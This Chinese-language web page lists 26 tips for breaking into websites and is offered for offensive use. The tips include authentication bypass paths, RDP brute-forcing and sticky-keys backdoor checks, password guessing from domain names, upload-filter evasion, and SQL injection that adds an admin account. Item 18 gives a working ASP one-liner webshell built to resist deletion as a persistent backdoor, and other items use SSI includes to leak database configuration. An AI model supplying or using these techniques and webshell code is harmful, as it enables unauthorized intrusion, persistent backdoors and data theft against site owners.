網(wǎng)站個人滲透技巧收集與總結(jié)

1.利用網(wǎng)站過濾不嚴直接繞過后臺驗證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp
2.有的網(wǎng)站進后臺會出現(xiàn)一個腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進入的意思。
3.有的網(wǎng)站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。
4.有時候進后臺會彈出提示框“請登陸”,把地址抄寫出來(復(fù)制不了),然后放在網(wǎng)頁源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進入后臺!
5.突破防盜鏈訪問webshell,代碼:
javascript:document.write("<a )
回車后點擊GO即可進入webshell
6.突破一流信息監(jiān)控攔截系統(tǒng)訪問,當小馬可以訪問,上傳大馬卻不行的時候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫備份后訪問即可!
7.在拿編輯器的shell時,有時增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,其實只要增加aaspsp 上傳asp就會突破了。
8.有時啊D猜出表段了,但是猜不到字段的時候,可以到后臺查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進行猜解內(nèi)容即可突破。
9.社工后臺密碼可以用這個技巧,假如網(wǎng)站域名是:exehack.Net 管理員名稱為admin,可以試試密碼“exehack”和“exehack.net”來登陸。
10.手工注入時如果網(wǎng)站過濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進行判斷。
11.本地構(gòu)造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復(fù)制多幾句話從而擴大文件大小,再上傳即可。
12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時放在穿山甲去跑一般都能跑出來!
13.猜管理員后臺小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。
14.知道表名,字段,使用SQL語句在ACCESS數(shù)據(jù)庫中加個用戶名及密碼語句:
Insert into admin(user,pwd) values('test','test')
15.當獲得管理員密碼,卻拿不到管理員的帳號時,到前臺隨便打開一個新聞,找找諸如“提交者”“發(fā)布者”之類的字眼,一般“提交者”就是管理員的帳號了。
16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對路徑,假設(shè)網(wǎng)站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。
17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網(wǎng)站了,我們可以去下載一套,里面有很多默認的信息值得利用。
18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級防刪的一句話木馬了,可以很安全的留個后門,菜刀連接密碼:x
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
19.當破解出帳號密碼卻找不到后臺的時候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進行登陸,成功的幾率可以很大的哦!ftp的默認端口:21 默認帳號密碼:test
20.有的后臺不顯示驗證碼,難道就沒法登錄了么? 其實把一段代碼導(dǎo)入注冊表里就可以突破這個困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!
REGEDIT4</p> <p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
21.當網(wǎng)站不允許上傳 asp、asa、php等文件時,我們可以上傳一個stm文件,代碼為:
“<!--#include file=”conn.asp”-->”
(想查看什么文件就寫什么文件名,這里我假設(shè)想查看“conn.asp”),
然后直接打開這個stm文件的地址,再查看源代碼,“conn.asp”這個文件的代碼就一覽無遺了!
22.當網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時,嘗試上傳一個shtm文件,內(nèi)容為:
<!--#includ file="conn.asp"-->
如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來,數(shù)據(jù)庫路徑也就到手啦!
23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點后面植入一句話木馬:
‘excute(request(“TNT”))
接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數(shù)據(jù)庫。
24.旁注的話,肯定是挑支持aspx的站點來日了,問題是怎樣判斷呢?方法很簡單,在在網(wǎng)站后面加上xxx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯誤,無法找到該資源,404畫面就說明支持aspx木馬。
25.網(wǎng)站后面加test.php 可以查看版本
26.禁忌這兩個網(wǎng)站后臺文件 admin_index.asp manage_login.asp
相關(guān)文章
thinkphp代碼執(zhí)行g(shù)etshell的漏洞解決
本文來介紹一下thinkphp官方修復(fù)的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導(dǎo)致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡(luò)攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實網(wǎng)絡(luò)攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點服務(wù)端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網(wǎng)站實例分析,需要的朋友可以參考下2017-05-19
- 這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導(dǎo)致sql注入安全問題,建議大家多看一下網(wǎng)上的安全文章,最好的防范就是先學(xué)2017-05-19
- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
XSS繞過技術(shù) XSS插入繞過一些方式總結(jié)
我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結(jié)了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關(guān)資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網(wǎng)站時,解決被封IP的幾種方法的相關(guān)資料,需要的朋友可以參考下2016-10-08